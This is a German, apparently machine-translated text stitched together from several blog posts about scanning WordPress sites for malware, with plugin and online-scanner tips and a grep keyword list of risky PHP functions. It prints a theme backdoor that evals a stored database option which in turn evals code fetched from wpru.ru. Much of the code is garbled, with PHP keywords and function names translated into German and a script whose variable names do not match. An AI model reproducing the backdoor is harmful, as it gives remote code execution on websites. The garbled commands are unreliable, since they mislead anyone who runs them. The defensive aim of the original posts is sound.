WordPress ist die beliebteste Engine zum Erstellen verschiedener Informationswebsites und Blogs. Die Sicherheit Ihrer Website geht über die Sicherheit Ihrer Daten hinaus. Dies ist viel wichtiger, denn es dient auch der Sicherheit aller Benutzer, die Ihre Ressource lesen und ihnen vertrauen. Aus diesem Grund ist es so wichtig, dass die Website nicht mit Viren oder anderem Schadcode infiziert ist.

Wir werden uns in einem der folgenden Artikel damit befassen, wie Sie WordPress vor Hackerangriffen schützen können, aber jetzt möchte ich Ihnen erklären, wie Sie eine WordPress-Website auf Viren und Schadcode überprüfen, um sicherzustellen, dass alles sicher ist.

Die allererste Option, die mir in den Sinn kommt, ist, dass Sie von Hackern gehackt wurden und ihre Hintertüren in den Code Ihrer Website eingebaut haben, um Spam versenden, Links setzen und andere schlechte Dinge tun zu können. Das kommt manchmal vor, ist aber ein eher seltener Fall, wenn Sie die Software rechtzeitig aktualisieren.

Es gibt Tausende kostenloser WordPress-Themes und verschiedener Plugins, und das könnte bereits eine Bedrohung darstellen. Es ist eine Sache, wenn Sie eine Vorlage von der WordPress-Site herunterladen, und eine ganz andere, wenn Sie sie auf der linken Site finden. Skrupellose Entwickler können verschiedene Schadcodes in ihre Produkte einbetten. Das Risiko ist sogar noch größer, wenn Sie Premium-Vorlagen kostenlos herunterladen, bei denen Hacker, ohne etwas zu riskieren, eine Art Sicherheitslücke hinzufügen können, durch die sie dann eindringen und tun können, was sie brauchen. Aus diesem Grund ist es so wichtig, eine WordPress-Site auf Viren zu überprüfen.

Überprüfen einer WordPress-Site auf Viren

Das erste, worauf Sie bei der Überprüfung einer Website achten müssen, sind keine Viren, sondern WordPress-Plugins. Sie können Ihre Website schnell und einfach scannen und verdächtige Codebereiche finden, die es wert sind, beachtet zu werden, sei es im Theme, Plugin oder im Wodpress-Kern selbst. Schauen wir uns einige der beliebtesten Plugins an:

1. Inhaltsverzeichnis

Dieses sehr einfache Plugin überprüft alle auf Ihrer Website installierten Themes, um festzustellen, ob sie schädlichen Code enthalten. Das Plugin erkennt versteckte Links, die durch Base64-Code-Einfügung verschlüsselt wurden, und zeigt außerdem detaillierte Informationen zu den gefundenen Problemen an. In den meisten Fällen handelt es sich bei den gefundenen Codeteilen nicht um Viren, sie können jedoch potenziell gefährlich sein, weshalb Sie auf sie achten sollten.

Offen "Aussehen" -> „TAC“ Warten Sie dann, bis alle Themen überprüft sind.

2. VIP-Scanner

Sehr ähnlich dem TOC-Themenscanner, zeigt jedoch detailliertere Informationen an. Dieselben Funktionen zur Erkennung von Links, verstecktem Code und anderen bösartigen Einfügungen. Öffnen Sie einfach den VIP-Scanner-Eintrag im Tools-Bereich und analysieren Sie das Ergebnis.

Es kann ausreichen, unnötige Dateien zu löschen, zum Beispiel die Datei „desktop.ini“. Oder Sie müssen sich genauer ansehen, was in Dateien mit base64 passiert.

3. Anti-Malware von GOTMLS.NET

Mit diesem Plugin können Sie nicht nur die Themes und den Kern der Site auf Viren scannen, sondern die Site auch vor Brute-Force-Passwörtern und verschiedenen XSS- und SQLInj-Angriffen schützen. Die Suche erfolgt auf Basis bekannter Signaturen und Schwachstellen. Einige Schwachstellen können vor Ort behoben werden. Um mit dem Scannen von Dateien zu beginnen, öffnen Sie „Anti-Malvare“ im Seitenmenü und klicken Sie auf „Scan ausführen“:

Bevor Sie einen Scan durchführen können, müssen Sie Ihre Signaturdatenbanken aktualisieren.

4. Wordfence

Dies ist eines der beliebtesten Plugins für WordPress-Sicherheit und Malware-Scanning. Neben dem Scanner, der die meisten Lesezeichen im WordPress-Code finden kann, gibt es einen ständigen Schutz vor verschiedenen Arten von Angriffen und Passwort-Brute-Force. Bei der Suche findet das Plugin mögliche Probleme mit verschiedenen Plugins und Themes und meldet die Notwendigkeit einer Aktualisierung von WordPress.

Öffnen Sie die Registerkarte „WPDefence“ im Seitenmenü und gehen Sie dann auf die Registerkarte "Scan" und drücke "Scan starten":

Der Scan kann einige Zeit dauern, aber wenn er abgeschlossen ist, wird Ihnen ein detaillierter Bericht der gefundenen Probleme angezeigt.

5. AntiVirus

Dies ist ein weiteres einfaches Plugin, das Ihre Website-Vorlage nach bösartigem Code durchsucht. Der Nachteil besteht darin, dass nur die aktuelle Vorlage gescannt wird, die Informationen jedoch ausreichend detailliert angezeigt werden. Sie sehen alle gefährlichen Funktionen, die im Theme enthalten sind, und können dann im Detail analysieren, ob von ihnen eine Gefahr ausgeht. Finden Sie einen Artikel „AntiVirus“ in den Einstellungen und klicken Sie dann auf „Jetzt die Theme-Vorlagen scannen“:

6. Integritätsprüfer

Es ist auch ratsam, die Integrität von WordPress-Dateien zu überprüfen, falls der Virus bereits irgendwo geschrieben hat. Sie können hierfür das Integrity Checker-Plugin verwenden. Es überprüft alle Kern-, Plugin- und Vorlagendateien auf Änderungen. Am Ende des Scans sehen Sie Informationen zu den geänderten Dateien.

Online Dienste

Es gibt auch mehrere Online-Dienste, mit denen Sie eine WordPress-Site auf Viren überprüfen oder nur die Vorlage überprüfen können. Hier sind einige davon:

themecheck.org- Sie laden das Theme-Archiv herunter und können alle Warnungen zu möglichen schädlichen Funktionen sehen, die darin verwendet werden. Sie können nicht nur Informationen zu Ihrem Theme anzeigen, sondern auch zu anderen Themes, die von anderen Benutzern hochgeladen wurden, sowie zu verschiedenen Versionen des Themes. Was auch immer die Plugins finden, finden Sie auf dieser Website. Die Überprüfung Ihres WordPress-Themes ist ebenfalls sehr wichtig.

virustotal.com– eine bekannte Ressource, mit der Sie Ihre Website oder Vorlagendatei auf Viren überprüfen können.

ReScan.pro- Das Scannen einer WordPress-Site auf Viren mithilfe dieses Dienstes ist kostenlos; es werden statische und dynamische Analysen durchgeführt, um mögliche Weiterleitungen zu erkennen; der Scanner öffnet die Seiten der Site. Prüft die Website anhand verschiedener Blacklists.

sitecheck.sucuri.net- ein einfacher Dienst zum Scannen von Websites und Themen auf Viren. Es gibt ein Plugin für WordPress. Erkennt gefährliche Links und Skripte.

Manuelle Prüfung

Nichts kann besser sein als die manuelle Überprüfung. Linux verfügt über dieses wunderbare grep-Dienstprogramm, mit dem Sie nach Vorkommen beliebiger Zeichenfolgen in einem Ordner mit Dateien suchen können. Es bleibt abzuwarten, wonach wir suchen werden:

eval – Mit dieser Funktion können Sie beliebigen PHP-Code ausführen. Sie wird nicht von Produkten mit Selbstachtung verwendet. Wenn eines der Plugins oder eines Themes diese Funktion verwendet, besteht eine fast 100-prozentige Wahrscheinlichkeit, dass es einen Virus enthält.

• base64_decode- Verschlüsselungsfunktionen können in Verbindung mit eval verwendet werden, um bösartigen Code zu verbergen, sie können aber auch für friedliche Zwecke verwendet werden, seien Sie also vorsichtig;
• sha1- eine andere Methode zur Verschlüsselung von Schadcode;
• gzinflate- Komprimierungsfunktion, gleiche Ziele, zusammen mit eval, zum Beispiel gzinflate(base64_decode(code);
• strrev- dreht die Zeile nicht um, bevor sie als Option zur primitiven Verschlüsselung verwendet werden kann;
• drucken- gibt Informationen an den Browser aus, zusammen mit gzinflate oder base64_decode ist es gefährlich;
• file_put_contents- WordPress selbst oder Plugins können immer noch Dateien im Dateisystem erstellen, aber wenn das Theme dies tut, sollten Sie vorsichtig sein und prüfen, warum es das tut, da Viren installiert werden können;
• file_get_contents– wird in den meisten Fällen zu friedlichen Zwecken verwendet, kann aber zum Herunterladen von Schadcode oder zum Lesen von Informationen aus Dateien verwendet werden;
• Locken- die selbe Geschichte;
• fopen- öffnet eine Datei zum Schreiben, man weiß nie zu welchem ​​Zweck;
• System- Die Funktion führt einen Befehl auf einem Linux-System aus. Wenn ein Theme, ein Plugin oder WordPress selbst dies tut, befindet sich dort höchstwahrscheinlich ein Virus;
• Symlink- Erstellt symbolische Links im System. Möglicherweise versucht der Virus, das Hauptdateisystem von außen zugänglich zu machen.
• Kopieren- kopiert eine Datei von einem Ort zum anderen;
• getcwd- gibt den Namen des aktuellen Arbeitsverzeichnisses zurück;
• cwd- ändert den aktuellen Arbeitsordner;
• ini_get- erhält Informationen über PHP-Einstellungen, oft zu friedlichen Zwecken, aber man weiß nie;
• error_reporting(0)- deaktiviert die Ausgabe etwaiger Fehlermeldungen;
• window.top.location.href- Javascript-Funktion für Weiterleitungen zu anderen Seiten;
• gehackt- Also, nur für den Fall, wir überprüfen, plötzlich beschloss der Hacker selbst, es uns zu sagen.

Sie können jedes einzelne Wort wie folgt in einen Befehl einsetzen:

grep -R „gehackt“ /var/www/path/to/files/wordpress/wp-content/

Oder verwenden Sie ein einfaches Skript, das nach allen Wörtern auf einmal sucht:

Werte="base64_decode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
window.top.location.href
Kopieren(
auswerten(
System(
Symlink(
error_reporting(0)
drucken
file_get_contents(
file_put_contents(
fopen(
gehackt“

cd /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php "$values" *

Hallo Freunde. Sind Sie sicher, dass die kostenlose WordPress-Vorlage, die Sie für Ihre Websites und Blogs verwenden, wirklich sicher ist und keine versteckten Bedrohungen oder bösartigen Code enthält? Bist du dir da völlig sicher? Absolut?)

Sie denken, Sie haben die Vorlage durchlaufen, versteckte Links daraus entfernt und die Arbeit ist erledigt. Sie scannen die Dateien der Website regelmäßig mit einem Antivirenprogramm, werfen einen Blick in die Yandex-Webmaster-Tools auf der Registerkarte „Sicherheit“ und sind erleichtert, die Meldung dort zu sehen: „ Auf der Website wurde kein Schadcode entdeckt«.

Das habe ich mir auch gedacht. Ich möchte dich nicht verärgern, aber...

Versteckter gefährlicher Code in kostenlosen WordPress-Vorlagen

Dies ist der Brief, den ich letzte Woche per E-Mail von meinem Hosting-Unternehmen erhalten habe. Vor kurzem haben sie eine regelmäßige Überprüfung aller Website-Dateien auf schädliche Inhalte eingeführt, und sie haben diese Inhalte tatsächlich bei mir gefunden!

Alles begann, als ich eines Nachmittags meine Website besuchte und sie nicht starten konnte – eine beleidigende Meldung erschien, dass Dateien mit der PHP-Erweiterung nicht gefunden wurden. Nachdem ich mich ein wenig angespannt hatte, untersuchte ich den Inhalt des Ordners mit der Site auf dem Hosting und entdeckte sofort ein Problem: Meine Vorlagendatei fuctions.php wurde in „functions.php.malware“ umbenannt, was mehrdeutig darauf hinzudeuten schien, dass es sich um ein Antivirenprogramm handelte Ich arbeite hier oder so ähnlich.) Nachdem ich zur Post gegangen war, fand ich den obigen Bericht des Hosters.

Das erste, was ich tat, war natürlich, diese Datei zu überprüfen, ihren Inhalt zu studieren, sie mit allen möglichen Antivirenprogrammen, Dutzenden von Online-Virenprüfdiensten usw. zu scannen. — Am Ende wurde nichts gefunden, alle waren sich einig, dass die Datei absolut sicher sei. Natürlich habe ich dem Hoster gegenüber meine Zweifel geäußert und gesagt, dass Sie etwas vermasselt hätten, aber für alle Fälle habe ich ihn gebeten, einen Bericht über die Entdeckung eines bösartigen Codestücks vorzulegen.

Und das haben sie mir geantwortet

Ich habe bei Google nach Informationen zu diesem Code gesucht und ernsthaft darüber nachgedacht ...

So finden Sie einen Schadcode in einer Vorlage

Wie sich herausstellt, handelt es sich hierbei um eine wirklich nicht triviale Technik, die es interessierten Parteien ermöglicht, ohne Ihr Wissen Daten an Ihre Website zu übermitteln und den Inhalt von Seiten zu ändern! Wenn Sie eine kostenlose Vorlage verwenden, dann Ich empfehle dringend, die Datei „functions.php“ auf den folgenden Code zu überprüfen:

add_filter('the_content', '_bloginfo', 10001);
Funktion _bloginfo($content)(
globaler $post;
if(is_single() && ($co=@eval(get_option(‘blogoption’))) !== false)(
return $co;
) sonst return $content;
}

Selbst mit meinen sehr oberflächlichen PHP-Kenntnissen ist es klar, dass ein bestimmter Filter erstellt wird, der an die globalen Variablen „post“ und „content“ gebunden ist, die dafür verantwortlich sind, Inhalte nur auf Blog-Post-Seiten anzuzeigen (die is_single-Bedingung). Schon verdächtig, nicht wahr? Nun wollen wir sehen, was dieser Code auf unserer Website anzeigen wird.

Die in der Datenbank angeforderte interessante Option blogoption sieht ebenfalls sehr verdächtig aus. Wir gehen in unsere MySQL-Datenbank und finden dort eine Tabelle namens wp_options. Wenn Sie die Präfixe nicht geändert haben, sieht sie standardmäßig so aus. Und darin finden wir die Zeile, die uns interessiert, namens blogoption

Was für eine Schönheit! Wir sehen die folgende Option

return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.’&m=47&n’));

Diese. Von einer bestimmten Website (und wohlgemerkt einer russischen) werden Inhalte zurückgegeben, die alles enthalten können! Beliebig viele Links, Schadcodes, veränderte Texte usw. Wenn Sie auf die Website selbst zugreifen, erhalten Sie einen 403-Zugriffsfehler, was nicht überraschend ist. Natürlich habe ich diese Option auch aus der Datenbank entfernt.

Nach Angaben von Opfern wird der genaue Inhalt Ihres Artikels in der Regel mit nur einer Änderung zurückgegeben – anstelle eines Punktes „.“ Im Text wurde ein offener Link versteckt! Übrigens wird diese Option bei der Installation der Vorlage selbst in die Datenbank geschrieben, und der Code, der dies tut, zerstört sich dann erfolgreich selbst. Und ich habe zwei Jahre lang mit solch einem Müll gelebt, und in dieser ganzen Zeit hat kein einziges Antivirenprogramm oder Dienst diese Bedrohung für mich erkannt. Um ehrlich zu sein, habe ich nicht bemerkt, ob dieser Trick jemals bei mir funktioniert hat oder ob mein Sicherheits-Plugin diese Funktion blockiert hat (oder vielleicht eines der WordPress-Updates diese Lücke geschlossen hat), aber es ist trotzdem unangenehm.

Moral über kostenlosen Käse

Wie gefällt Ihnen die Raffinesse unserer „Übersetzer“ von Vorlagen (oder derjenigen, die sie in ihren Katalogen veröffentlichen)? Es ist nicht Ihre Aufgabe, Links aus der Fußzeile herauszuschneiden.) Schade, dass ich mich nicht mehr erinnern kann, wo ich meine Vorlage heruntergeladen habe, das ist schon lange her, sonst hätte ich auf jeden Fall ein paar liebevolle Links geschrieben. Und wenn ich damals die gleichen Erfahrungen gemacht hätte wie jetzt, hätte ich definitiv keine kostenlose Vorlage verwendet oder sie im Extremfall nicht von unbekannten Quellen heruntergeladen!

Es ist einfacher, ein offizielles Premium-Template für 15 bis 20 Dollar zu kaufen und in Frieden zu leben, mit dem Wissen, dass es keine Lücken oder verschlüsselten Links enthält, und selbst wenn es Schwachstellen gibt, werden die Entwickler auf jeden Fall ein Update veröffentlichen, in dem diese Lücken enthalten sein werden geschlossen. ( Übrigens hat Artem kürzlich einen Artikel veröffentlicht, in dem er über Premium-Vorlagen spricht und sogar Aktionscodes für brutale Rabatte an Interessierte verteilt)

Hallo IdeaFox-Freunde!

Ich weiß nicht, wie es dir geht, aber ich habe nachts Schlafstörungen. Ich quäle mich mit Blog-Sicherheitsproblemen. Ich habe keine Kraft mehr :-)

Ich habe eine Reihe von Blogs zu diesem Thema gelesen und viele Plugins getestet, die zur Lösung dieses Problems beitragen. Und in den Kommentaren begannen sie, Fragen zum Thema Site-Schutz zu stellen, was mich dazu veranlasste, diese Notiz zu schreiben.

Stellen Sie sich vor, Sie führen einen Blog, schreiben Artikel, versuchen es... Und böse Arschlöcher kommen und zerstören Ihre Website. Ich denke, es wird viel Trauer geben.

Schließlich investiert jeder normale Blogger viel Zeit und Mühe in die Entwicklung seiner Website. Und für viele wird das Bloggen generell zur Obsession... Hier und bis, wenn DAS passiert :-)

Nun, Sie verstehen, wie wichtig das ist.

Kommen wir endlich zur Sache :)

Vor ein paar Monaten habe ich bereits eine Notiz zum Thema Hacking geschrieben. Lesen Sie es unbedingt durch. Doch seitdem ist ziemlich viel Zeit vergangen und ich habe zusätzliche Maßnahmen ergriffen, um die Gesamtverteidigung zu stärken.

In den folgenden Anmerkungen werde ich auf jeden Fall ausführlich auf dieses Thema eingehen. (Ich erinnere mich auch an die ISP-Einstellungen und schreibe darüber)

3. Überprüfen Sie die Website auf andere Online-Dienste

An solchen Diensten mangelt es nicht. Ich bin der festen Überzeugung, dass viele von ihnen völlig dumm sind und nur für die Anzeige von Werbung geschaffen wurden.

Doktor Web

Die Firma DR.Web hat einen guten Service für die Online-Überprüfung von Websites bereitgestellt. Persönlich hat er mir einmal dabei geholfen, eine Infektion im Blog eines Freundes zu finden (in der .htaccess-Datei befand sich Code von Drittanbietern).

Die Prüfung ist sehr einfach. Geben Sie Ihre URL ein und warten Sie auf das Verifizierungsergebnis.

antivirus-alarm.ru

Ein leistungsstarker Website-Scanner, der bis zu 43 Antiviren-Datenbanken der weltweit führenden Antiviren-Unternehmen nutzt.

Auch hier ist alles ganz einfach. Wir geben die URL unserer Seite ein und warten gespannt auf die Scan-Ergebnisse.

Darauf habe ich gewartet.

Alles ist sauber, man kann ruhig schlafen :-)

Das alles ist natürlich gut, aber Sie müssen auch ein paar Plugins installieren, die für WordPress-Blogs überhaupt nicht schaden.

4. Bitten Sie Ihren Host, Ihre Website zu überprüfen

Tatsache ist, dass Hoster sich noch mehr Gedanken über Sicherheitsfragen machen als Sie und über wirksame Sicherheitsmaßnahmen verfügen. Darüber hinaus mit speziellen Schutzmitteln.

Das sind die Neuigkeiten, die ich heute für Sie habe. Als nächstes erzähle ich Ihnen von einem sehr leistungsstarken Plugin, das Ihr WordPress-Blog erheblich vor Hackern schützen kann.

Ich arbeite bereits seit 2 Monaten mit ihm zusammen und bin sehr zufrieden mit ihm. Während ich es herausgefunden habe, habe ich mich dreimal selbst gesperrt: –) Kurz gesagt, es gibt etwas zu erzählen.

Einer der wichtigsten Schritte beim Erstellen eines Blogs ist die Auswahl einer hochwertigen Vorlage. Es gibt viele Websites, sowohl kostenpflichtige als auch kostenlose. Allerdings müssen Sie hier vorsichtig sein, da die Wahrscheinlichkeit hoch ist, dass Sie mit der Datei Viren, bösartige Skripte und versteckte Links erhalten.

Aber selbst wenn die Vorlage in puncto Sicherheit sauber ist und Sie mit Design, Benutzerfreundlichkeit und Funktionalität rundum zufrieden sind, heißt das nicht, dass alles in Ordnung ist. Das Theme muss über gültigen HTML- und CSS-Code verfügen und außerdem allen WordPress-CMS-Standards entsprechen. Selbst kostenpflichtige Themes und individuell erstellte Vorlagen haben mit Letzterem Probleme.

Engine-Entwickler entwickeln sie ständig weiter, und Vorlagenautoren halten nicht immer mit ihnen Schritt, da sie bei der Erstellung veraltete Funktionen verwenden.

Heute zeige ich Ihnen zwei Möglichkeiten, WordPress-Themes auf Standardkonformität zu überprüfen. Diese Tools werden verwendet, wenn sie dem offiziellen Verzeichnis https://wordpress.org/themes/ hinzugefügt werden.

Service zur Überprüfung von WordPress-Themes und Joomla-Vorlagen auf Einhaltung von Standards

ThemeCheck.org ist ein kostenloser Dienst, mit dem Sie die Sicherheit und Qualität von Vorlagen für CMS WordPress und Joomla überprüfen können, bevor Sie diese auf Ihrer Website installieren.

Um ein Theme zu überprüfen, laden Sie dessen Archiv von Ihrem Computer herunter, indem Sie auf themecheck.org auf die Schaltfläche „Datei auswählen“ klicken. Wenn Sie nicht möchten, dass die Scanergebnisse im Dienst gespeichert und anderen Benutzern zur Verfügung gestellt werden, aktivieren Sie das Kontrollkästchen „ Vergessen Sie hochgeladene Daten nach den Ergebnissen„. Klicken Sie nun auf die Schaltfläche „Senden“.

Ich habe zum Beispiel das Thema übernommen Schnittstelle, das ich von der offiziellen Website heruntergeladen habe. 99 von 100 – 0 kritische Fehler und 1 Warnung. Das ist ein sehr gutes Ergebnis.

Im Vergleich dazu erhielt meine Blog-Vorlage eine Bewertung von 0 (14 Fehler und 23 Warnungen). Ich denke, dass die Ergebnisse für viele nicht viel anders sein werden, insbesondere wenn die Themen bereits veraltet sind. Alle Notizen mit Erläuterungen und Angabe der Dateien und Zeilen, in denen sie gefunden wurden, befinden sich auf derselben Seite unten.

Ehrlich gesagt habe ich dort nicht viel verstanden; es wäre für Autoren nützlicher und es ist für mich einfacher, die Vorlage zu ändern, als alles zu reparieren. Ich weiß nur nicht, wann ich mich dazu entschließen werde.

Auf Home gibt es eine große Auswahl bereits getesteter WordPress- und Joomla-Webthemen mit der Möglichkeit, nach Hinzufügungszeit oder Bewertung zu sortieren. Wenn Sie darauf klicken, sehen Sie detaillierte Informationen und Links zur Website und Download-Seite des Autors.

Wenn Sie Entwickler sind und Ihr Theme zu 100 % gültig ist, können Sie Benutzer darüber informieren, indem Sie ein spezielles Abzeichen mit einer Bewertung darauf installieren.

Der Wert des ThemeCheck.org-Dienstes besteht darin, dass jeder Webmaster damit ein hochwertiges Theme auswählen kann, bevor er es im Blog installiert.

Theme-Check-Plugin

Mit dem Theme-Check-Plugin können Sie ein bereits installiertes Template auf Kompatibilität mit den neuesten WordPress-Standards prüfen. Link zum Herunterladen der neuesten Version: https://wordpress.org/plugins/theme-check/

Die Funktionalität des Plugins ähnelt dem oben beschriebenen Dienst. Nach der Standardinstallation und Aktivierung müssen keine Einstellungen vorgenommen werden. Prüfverfahren:

1. Gehen Sie im Admin-Panel auf die Menüseite „Aussehen“ – „Theme-Check“.
2. Wählen Sie das gewünschte Theme aus der Dropdown-Liste aus, wenn Sie mehrere installiert haben.
3. Aktivieren Sie das Kontrollkästchen „INFO unterdrücken“, wenn Sie keine Informationen senden möchten.
4. Klicken Sie auf die Schaltfläche „Überprüfen“.

Die Ergebnisse werden auf derselben Seite angezeigt.

Wie Sie sehen können, das Standardthema Zwanzig Zehn Es ist auch nicht ideal, aber zum Beispiel Zweitausendvierzehn hat keine Fehler.

Nach der Überprüfung kann das Plugin bis zum nächsten Mal deaktiviert oder besser noch vollständig entfernt werden.

Abschluss. Bevor Sie ein neues WordPress-Template installieren, prüfen Sie es nicht nur mit dem TAC-Plugin auf versteckte Links und Schadcode, sondern auch mit dem ThemeCheck.org-Dienst oder dem Theme Check-Plugin auf Übereinstimmung mit den neuesten CMS-Standards.

P.S. Kürzlich habe ich beim Durchsuchen von TopSape Reader einen neuen SEO-Blog zenpr.ru gesehen, der in Bezug auf die Klicks pro Monat den 1. Platz unter den Bloggern einnimmt. Wenn man bedenkt, dass er erst etwas mehr als einen Monat alt ist, verdient das Ergebnis Respekt. Das Design ist im Stil des Minimalismus gehalten, um nicht zu sagen, dass es ihn überhaupt nicht gibt, aber der Autor schreibt – Sie werden es lesen. Alles auf den Punkt und ohne Wasser. Genau wie im Blogtitel – „null zusätzliche Zeichen“. Ich empfehle die Lektüre, Sie werden viele nützliche Informationen finden.